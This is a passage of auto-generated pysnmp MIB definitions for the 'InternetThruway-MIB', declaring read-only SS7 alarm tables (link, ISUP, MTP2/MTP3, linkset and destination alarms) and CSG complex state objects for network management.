if mibBuilder.loadTexts: lfIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
lfLinkCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfLinkCode.setStatus('mandatory')
if mibBuilder.loadTexts: lfLinkCode.setDescription('This object identifies the signalling link code (SLC) of the failed link.')
lfTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lfTimeStamp.setDescription('Indicates the time of the alarm.')
lfName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfName.setStatus('mandatory')
if mibBuilder.loadTexts: lfName.setDescription('Indicates the configured name for the machine which sent the alarm.')
lfCardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfCardId.setStatus('mandatory')
if mibBuilder.loadTexts: lfCardId.setDescription('This object identifies the device that hosts the failed link. It provides a physical description of the device, as well as its slot number.')
lfLinkSet = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfLinkSet.setStatus('mandatory')
if mibBuilder.loadTexts: lfLinkSet.setDescription('This object identifies the linkset associated with the link via its adjacent point code.')
ss7LinkCongestionAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13), )
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTable.setDescription('The SS7LinkCongestionAlarmTable contains alarms to indicate congestion on an SS7 link.')
ss7LinkCongestionAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1), ).setIndexNames((0, "InternetThruway-MIB", "lcIndex"))
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkCongestionAlarmTableEntry.setDescription('This object defines a row within the SS7 Link Congestion Alarm Table. A row can be uniquely identified with the row index.')
lcIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 1), Integer32())
if mibBuilder.loadTexts: lcIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lcIndex.setDescription('Identifies the row number in the table.')
lcKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcKey.setStatus('mandatory')
if mibBuilder.loadTexts: lcKey.setDescription('Unique identifier for the alarm.')
lcIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: lcIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
lcLinkCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcLinkCode.setStatus('mandatory')
if mibBuilder.loadTexts: lcLinkCode.setDescription('This object identifies the signalling link code (SLC) of the affected link.')
lcTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lcTimeStamp.setDescription('Indicates the time of the alarm.')
lcName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcName.setStatus('mandatory')
if mibBuilder.loadTexts: lcName.setDescription('Indicates the configured name for the machine which sent the alarm.')
lcCardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcCardId.setStatus('mandatory')
if mibBuilder.loadTexts: lcCardId.setDescription('This object identifies the device that hosts the failed link. It provides a physical description of the device, as well as its slot number.')
lcLinkSet = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 13, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lcLinkSet.setStatus('mandatory')
if mibBuilder.loadTexts: lcLinkSet.setDescription('This object identifies the linkset associated with the link via its adjacent point code.')
ss7ISUPFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14), )
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTable.setDescription('The SS7ISUPFailureAlarmTable contains alarms for SS7 ISUP protocol stack failures.')
ss7ISUPFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1), ).setIndexNames((0, "InternetThruway-MIB", "ifIndex"))
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 ISUP Failure Alarm Table. A row can be uniquely identified with the row index.')
ifIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 1), Integer32())
if mibBuilder.loadTexts: ifIndex.setStatus('mandatory')
if mibBuilder.loadTexts: ifIndex.setDescription('Identifies the row number in the table.')
ifKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifKey.setStatus('mandatory')
if mibBuilder.loadTexts: ifKey.setDescription('Unique identifier for the alarm.')
ifIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: ifIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
ifTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 4), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: ifTimeStamp.setDescription('Indicates the time of the alarm.')
ifName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 14, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ifName.setStatus('mandatory')
if mibBuilder.loadTexts: ifName.setDescription('Indicates the configured name for the machine which sent the alarm.')
ss7ISUPCongestionAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15), )
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTable.setDescription('The SS7ISUPCongestionAlarmTable contains alarms to indicate congestion with an ISUP protocol stack.')
ss7ISUPCongestionAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1), ).setIndexNames((0, "InternetThruway-MIB", "icIndex"))
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7ISUPCongestionAlarmTableEntry.setDescription('This object defines a row within the SS7 ISUP Congestion Alarm Table. A row can be uniquely identified with the row index.')
icIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 1), Integer32())
if mibBuilder.loadTexts: icIndex.setStatus('mandatory')
if mibBuilder.loadTexts: icIndex.setDescription('Identifies the row number in the table.')
icKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icKey.setStatus('mandatory')
if mibBuilder.loadTexts: icKey.setDescription('Unique identifier for the alarm.')
icIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: icIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
icCongestionLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icCongestionLevel.setStatus('mandatory')
if mibBuilder.loadTexts: icCongestionLevel.setDescription('This object indicates the congestion level with an ISUP protocol stack. Possible congestion levels are: (0) Normal (1) Congestion ')
icTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: icTimeStamp.setDescription('Indicates the time of the alarm.')
icName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 15, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: icName.setStatus('mandatory')
if mibBuilder.loadTexts: icName.setDescription('Indicates the configured name for the machine which sent the alarm.')
ss7MTP3CongestionAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16), )
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTable.setDescription('The SS7MTP3CongestionAlarmTable contains alarms to indicate congestion on an MTP3 link.')
ss7MTP3CongestionAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1), ).setIndexNames((0, "InternetThruway-MIB", "mtp3Index"))
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP3CongestionAlarmTableEntry.setDescription('This object defines a row within the SS7 MTP3 Congestion Alarm Table. A row can be uniquely identified with the row index.')
mtp3Index = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 1), Integer32())
if mibBuilder.loadTexts: mtp3Index.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3Index.setDescription('Identifies the row number in the table.')
mtp3Key = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3Key.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3Key.setDescription('Unique identifier for the alarm.')
mtp3IPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3IPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3IPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
mtp3CongestionLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3CongestionLevel.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3CongestionLevel.setDescription('This object indicates the congestion level on a problem SS7 Link. Possible congestion values are: (0) Normal (1) Minor (2) Major (3) Critical ')
mtp3TimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3TimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3TimeStamp.setDescription('Indicates the time of the alarm.')
mtp3Name = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 16, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp3Name.setStatus('mandatory')
if mibBuilder.loadTexts: mtp3Name.setDescription('Represents the configured name of the machine which sent the alarm.')
ss7MTP2TrunkFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17), )
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTable.setDescription('The SS7MTP2TrunkFailureAlarmTable contains alarms to indicate MTP2 trunk failures.')
ss7MTP2TrunkFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1), ).setIndexNames((0, "InternetThruway-MIB", "mtp2Index"))
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 MTP2 Failure Alarm Table. A row can be uniquely identified with the row index.')
class MTP2AlarmConditionType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("fasError", 1), ("carrierLost", 2), ("synchroLost", 3), ("aisRcv", 4), ("remoteAlarmRcv", 5), ("tooHighBer", 6))
mtp2Index = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 1), Integer32())
if mibBuilder.loadTexts: mtp2Index.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2Index.setDescription('Identifies the row number in the table.')
mtp2Key = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2Key.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2Key.setDescription('Unique identifier for the alarm.')
mtp2IPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2IPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2IPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
mtp2Name = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2Name.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2Name.setDescription('This object identifies the configured name of the machine which sent the alarm.')
mtp2CardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2CardId.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2CardId.setDescription('This object indicates the device upon which the affected trunk is hosted. The string contains a physical description of the device, as well as its slot number.')
mtp2AlarmCondition = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 6), MTP2AlarmConditionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2AlarmCondition.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2AlarmCondition.setDescription('This object indicates which of the possible alarm conditions is in effect. Alarms are not nested: a new alarm is only reported if there is no current alarm condition.')
mtp2TimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 17, 1, 7), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mtp2TimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: mtp2TimeStamp.setDescription('Indicates the time of the alarm.')
ss7LinksetFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18), )
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTable.setDescription('The SS7LinksetFailureAlarmTable contains alarms to indicate failure on an CSG linkset.')
ss7LinksetFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1), ).setIndexNames((0, "InternetThruway-MIB", "lsFailureIndex"))
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinksetFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 Linkset Failure Alarm Table. A row can be uniquely identified with the row index.')
lsFailureIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 1), Integer32())
if mibBuilder.loadTexts: lsFailureIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureIndex.setDescription('Identifies the row number in the table.')
lsFailureKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureKey.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureKey.setDescription('Unique identifier for the alarm.')
lsFailureIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
lsFailureName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureName.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureName.setDescription('Represents the configured name of the machine which sent the alarm.')
lsFailurePointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailurePointcode.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailurePointcode.setDescription('This object indicates the pointcode associated with the linkset.')
lsFailureTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 18, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsFailureTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lsFailureTimeStamp.setDescription('Indicates the time of the alarm.')
ss7DestinationInaccessibleAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19), )
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTable.setDescription('The SS7DestinationAccessAlarmTable contains alarms which indicate inaccessible signalling destinations.')
ss7DestinationInaccessibleAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1), ).setIndexNames((0, "InternetThruway-MIB", "destInaccessIndex"))
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationInaccessibleAlarmTableEntry.setDescription('This object defines a row within the SS7 Destination Inaccessible Alarm Table. A row can be uniquely identified with the row index.')
destInaccessIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 1), Integer32())
if mibBuilder.loadTexts: destInaccessIndex.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessIndex.setDescription('Identifies the row number in the table.')
destInaccessKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessKey.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessKey.setDescription('Unique identifier for the alarm.')
destInaccessIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
destInaccessName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessName.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessName.setDescription('Represents the configured name of the machine which sent the alarm.')
destInaccessPointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessPointcode.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessPointcode.setDescription('This object indicates the point code of the inaccessible signalling destination.')
destInaccessTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 19, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destInaccessTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: destInaccessTimeStamp.setDescription('Indicates the time of the alarm.')
ss7DestinationCongestedAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20), )
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTable.setDescription('The SS7DestinationCongestedAlarmTable contains alarms to indicate congestion on the given destination.')
ss7DestinationCongestedAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1), ).setIndexNames((0, "InternetThruway-MIB", "destCongestIndex"))
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7DestinationCongestedAlarmTableEntry.setDescription('This object defines a row within the SS7 Destination Congestion Table. A row can be uniquely identified with the row index.')
destCongestIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 1), Integer32())
if mibBuilder.loadTexts: destCongestIndex.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestIndex.setDescription('Identifies the row number in the table.')
destCongestKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestKey.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestKey.setDescription('Unique identifier for the alarm.')
destCongestIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
destCongestName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestName.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestName.setDescription('Represents the configured name of the machine which sent the alarm.')
destCongestPointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestPointcode.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestPointcode.setDescription('This object indicates the pointcode of the congested destination.')
destCongestCongestionLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestCongestionLevel.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestCongestionLevel.setDescription('This object indicates the congestion level on a problem SS7 pointcode. Possible congestion values are: (0) Normal (1) Minor (2) Major (3) Critical ')
destCongestTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 20, 1, 7), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destCongestTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: destCongestTimeStamp.setDescription('Indicates the time of the alarm.')
ss7LinkAlignmentAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21), )
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTable.setDescription('The SS7LinkAlignmentAlarmTable contains alarms to indicate congestion on the CSG.')
ss7LinkAlignmentAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1), ).setIndexNames((0, "InternetThruway-MIB", "linkAlignIndex"))
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkAlignmentAlarmTableEntry.setDescription('This object defines a row within the SS7 Link Alignment Alarm Table. A row can be uniquely identified with the row index.')
linkAlignIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 1), Integer32())
if mibBuilder.loadTexts: linkAlignIndex.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignIndex.setDescription('Identifies the row number in the table.')
linkAlignKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignKey.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignKey.setDescription('Unique identifier for the alarm.')
linkAlignIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
linkAlignName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignName.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignName.setDescription('Represents the configured name of the machine which sent the alarm.')
linkAlignLinkCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignLinkCode.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignLinkCode.setDescription('This object identifies the signalling link code (SLC) of the affected link.')
linkAlignTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignTimeStamp.setDescription('Indicates the time of the alarm.')
linkAlignCardId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignCardId.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignCardId.setDescription('This object identifies the device that hosts the failed link. It provides a physical description of the device, as well as its slot number.')
linkAlignLinkSet = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 21, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignLinkSet.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignLinkSet.setDescription('This object identifies the linkset associated with the link via its adjacent point code.')
csgComplexStateTrapInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22))
cplxName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxName.setStatus('mandatory')
if mibBuilder.loadTexts: cplxName.setDescription('CLLI, A unique identifier of the CSG Complex.')
cplxLocEthernetName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocEthernetName.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocEthernetName.setDescription(' The EthernetName attribute value of the node.')
cplxLocEthernetIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocEthernetIP.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocEthernetIP.setDescription(' The EthernetIP attribute value of the node.')
cplxLocOperationalState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocOperationalState.setDescription(' The OperationalState of the node. Possible values are: UNKNOWN, ENABLED, ENABLED_NETDSC, ENABLED_NETPAR, DISABLED ')
cplxLocStandbyState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocStandbyState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocStandbyState.setDescription(' The StandbyState attribute value of the node. Possible values are: UNKNOWN, HOT_STANDBY, COLD_STANDBY, WARM_STANDBY, PROVIDING_SERVICE ')
cplxLocAvailabilityState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxLocAvailabilityState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxLocAvailabilityState.setDescription(' The AvailabilityState attribute value of the node. Possible values are: UNKNOWN, AVAILABLE, DEGRADED, OFFLINE ')
cplxMateEthernetName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateEthernetName.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateEthernetName.setDescription(' The EthernetName attribute value of the mate node.')
